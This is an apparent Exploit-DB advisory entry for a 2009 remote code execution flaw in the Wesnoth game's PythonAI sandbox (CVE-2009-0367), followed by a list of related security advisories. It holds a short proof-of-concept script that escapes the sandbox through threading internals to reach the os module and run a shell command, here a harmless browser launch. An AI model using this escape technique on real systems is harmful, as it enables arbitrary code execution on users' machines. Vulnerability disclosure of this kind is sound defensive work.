Lucene search
WesnothEDB-ID:32837HistoryFeb 25, 2009 - 12:00 a.m.
Wesnoth 1.x - PythonAI Remote Code Execution
2009-02-2500:00:00
Wesnoth
www.exploit-db.com
14
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/33971/info
Wesnoth is prone to a remote code-execution vulnerability caused by a design error.
Attackers can exploit this issue to execute arbitrary Python code in the context of the user running the vulnerable application.
Versions prior to Wesnoth 1.5.11 are affected.
#!WPY
import threading
os = threading._sys.modules['os']
f = os.popen("firefox 'http://www.example.com'")
f.close() Related
seebug
seebug
Battle for Wesnoth PythonAIๆจกๅ็ป่ฟๅฎๅ
จ้ๅถๆผๆด
2009-03-05 00:00:00
redhatcve
redhatcve
CVE-2009-0367
2019-10-04 21:11:46
ubuntucve
ubuntucve
CVE-2009-0367
2009-03-05 00:00:00
cvelist
cvelist
CVE-2009-0367
2009-03-05 02:00:00
prion
prion
Code injection
2009-03-05 02:30:00
nvd
nvd
CVE-2009-0367
2009-03-05 02:30:00
cve
cve
CVE-2009-0367
2009-03-05 02:30:00
debian
debian
[Backports-security-announce] Security Update for wesnoth
2009-02-27 09:30:14
[SECURITY] [DSA 1737-1] New wesnoth packages fix several vulnerabilities
2009-03-11 15:16:56
[Backports-security-announce] Security Update for wesnoth
2009-02-27 10:16:46
securityvulns
securityvulns
wesnoth game multiple security vulnerabilities
2009-03-12 00:00:00
[SECURITY] [DSA 1737-1] New wesnoth packages fix several vulnerabilities
2009-03-12 00:00:00
osv
osv
wesnoth - several vulnerabilities
2009-03-11 00:00:00
nessus
nessus
Debian DSA-1737-1 : wesnoth - several vulnerabilities
2009-03-12 00:00:00
openvas
openvas
Debian Security Advisory DSA 1737-1 (wesnoth)
2009-03-13 00:00:00
Debian: Security Advisory (DSA-1737-1)
2009-03-13 00:00:00